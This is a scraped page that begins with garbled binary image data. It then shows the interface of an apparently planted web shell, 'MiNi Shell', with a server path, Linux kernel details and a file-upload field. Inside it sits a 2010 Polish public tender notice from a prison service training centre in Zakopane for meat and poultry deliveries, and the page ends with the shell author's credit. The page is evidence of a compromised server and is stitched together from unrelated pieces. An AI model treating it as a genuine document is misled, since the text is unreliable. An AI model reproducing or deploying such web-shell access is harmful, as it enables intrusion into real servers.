JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/24702-N-2010.html

<p class="kh_header"><b>Zakopane: Dostawa mięsa i wyrobów mięsnych</b><br>
<b>Numer ogłoszenia: 24702 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Zakopanem , ul. Ogrodowa 6, 34-500 Zakopane, woj. małopolskie, tel. 0-18 2013431, faks 0-18 2013431 wew. 813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.sw.gov.pl/index.php/jednostki/6/319</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka sektora finansów publicznych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mięsa i wyrobów mięsnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest dostawa mięsa i wyrobów mięsnych z grupy 15131000-8 w następujących ilościach: 



Grupa I Mięso i wędliny wieprzowe

 1. Baleron gotowany 			 300kg

 2. Kabanos 					150kg

 3. Kiełbasa krakowska parzona		200kg

 4. Kiełbasa krakowska sucha	 300kg

 5. Kiełbasa szynkowa 			200kg

 6. Kiełbasa toruńska 			250kg

 7. Kiełbasa swojska 			 50kg

 8. Kiełbasa zielonogórska 		200kg

 9. Kiełbasa zwyczajna 			150kg

10. Kiełbaski debreczynki 			100kg

11. Parówki cienkie wieprzowe		300kg

12. Polędwica sopocka 		 300kg

13. Schab pieczony 			250kg

14. Wędzonka krotoszyńska 		300kg

15. Kiełbasa biała 				300kg

16. Kiełbasa kanapkowa 			200kg

17. Rolada z boczku 			250kg

18. Kiełbasa głogowska 		 	 50kg 

19. Golonkowa prasowana 		 100kg 

20. Szynka gotowana 			 300kg 

21. Szynka konserwowa 			 200kg

22. Szynka wiejska 			 	 200kg 

23. Szynka Gażdżiny 			 150kg

24. Szynka łopatkowa 			 200kg 

25. Szynka domowa 			 200kg

26. Szynka wiedeńska 			 100kg

27. Boczek wędzony bez kości		 800kg

28. Boczek świeży bez kości		 50kg

29. Mięso gulaszowe wieprzowe	 	 400kg

30. Schab wieprzowy z kością 800kg

31. Schab wieprzowy bez kości 800kg

32. Słonina świeża			 	 150kg

33. Szynka wieprzowa bez kości 500kg 

34. Golonka wieprzowa przednia 50kg

35. Wątroba wieprzowa		 20kg

36. Karczek wieprzowy z kością 300kg 

37. Karczek wieprzowy bez kości 800kg

38. Nogi wieprzowe 30kg



Grupa II Drób i wędliny drobiowe

1. Filet z indyka surowy 			500 kg

2. Filet z indyka wędzony 		 150kg

3. Udko z kurczaka surowe		800kg

4. Filet z kurczaka surowy 		600kg

5. Polędwica drobiowa 			200kg

6. Skrzydełka z kurczaka 			100kg

7. Dramstyki ( podudzie) z kurczaka 	400kg

8. Szynka z indyka 			 150kg



Grupa III Mięso wołowe

1. Pieczeń wołowa				 600kg

2. Rozbeft					 200kg

3. Flaki wołowe 				 150kg

4. Polędwica wołowa 			 50kg

5. Mięso gulaszowe wołowe 	 400kg



Grupa IV Mięso cielęce

1. Udziec cielęcy bez kości		 200kg

2. Mięso gulaszowe cielęce	 250kg



Określona ilość towaru jest wielkością szacunkową. Zamawiający nie gwarantuje zrealizowania całości zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą brać udział wykonawcy, spełniający warunki określone w SIWZ oraz w spełniający oraz art. 22 ust., a także nie podlegający wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004. Potwierdzenie spełnienia tych warunków nastąpi na podstawie dokumentów wyszczególnionych w specyfikacji istotnych warunków zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> . Formularz ofertowy. 2. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 3. Oświadczenie o spełnieniu warunków udziału w postępowaniu. 4*. Upoważnienie do podpisania oferty. 5*. Umowa spółki cywilnej lub umowa spółki z o.o. * jeśli dotyczy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.sw.gov.pl/index.php/zamowienia/6/108.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.sw.gov.pl/index.php/zamowienia/6/108.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2010 godzina 10:00, miejsce: Ofertę należy złożyć w Sekretariacie w siedzibie zamawiającego, pokój numer 102.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso i wędliny wieprzowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Baleron gotowany 			 300kg

 2. Kabanos 					150kg

 3. Kiełbasa krakowska parzona		200kg

 4. Kiełbasa krakowska sucha	 300kg

 5. Kiełbasa szynkowa 			200kg

 6. Kiełbasa toruńska 			250kg

 7. Kiełbasa swojska 			 50kg

 8. Kiełbasa zielonogórska 		200kg

 9. Kiełbasa zwyczajna 			150kg

10. Kiełbaski debreczynki 			100kg

11. Parówki cienkie wieprzowe		300kg

12. Polędwica sopocka 		 300kg

13. Schab pieczony 			250kg

14. Wędzonka krotoszyńska 		300kg

15. Kiełbasa biała 				300kg

16. Kiełbasa kanapkowa 			200kg

17. Rolada z boczku 			250kg

18. Kiełbasa głogowska 		 	 50kg 

19. Golonkowa prasowana 		 100kg 

20. Szynka gotowana 			 300kg 

21. Szynka konserwowa 			 200kg

22. Szynka wiejska 			 	 200kg 

23. Szynka Gażdżiny 			 150kg

24. Szynka łopatkowa 			 200kg 

25. Szynka domowa 			 200kg

26. Szynka wiedeńska 			 100kg

27. Boczek wędzony bez kości		 800kg

28. Boczek świeży bez kości		 50kg

29. Mięso gulaszowe wieprzowe	 	 400kg

30. Schab wieprzowy z kością 800kg

31. Schab wieprzowy bez kości 800kg

32. Słonina świeża			 	 150kg

33. Szynka wieprzowa bez kości 500kg 

34. Golonka wieprzowa przednia 50kg

35. Wątroba wieprzowa		 20kg

36. Karczek wieprzowy z kością 300kg 

37. Karczek wieprzowy bez kości 800kg

38. Nogi wieprzowe 30kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drób i wędliny drobiowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Filet z indyka surowy 			500 kg

2. Filet z indyka wędzony 		 150kg

3. Udko z kurczaka surowe		800kg

4. Filet z kurczaka surowy 		600kg

5. Polędwica drobiowa 			200kg

6. Skrzydełka z kurczaka 			100kg

7. Dramstyki ( podudzie) z kurczaka 	400kg

8. Szynka z indyka 			 150kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso wołowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Pieczeń wołowa				 600kg

2.Rozbeft					 200kg

3.Flaki wołowe 				 150kg

4.Polędwica wołowa 			 50kg

5. Mięso gulaszowe wołowe 	 400kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso cielęce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Udziec cielęcy bez kości		 200kg

2. Mięso gulaszowe cielęce	 250kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com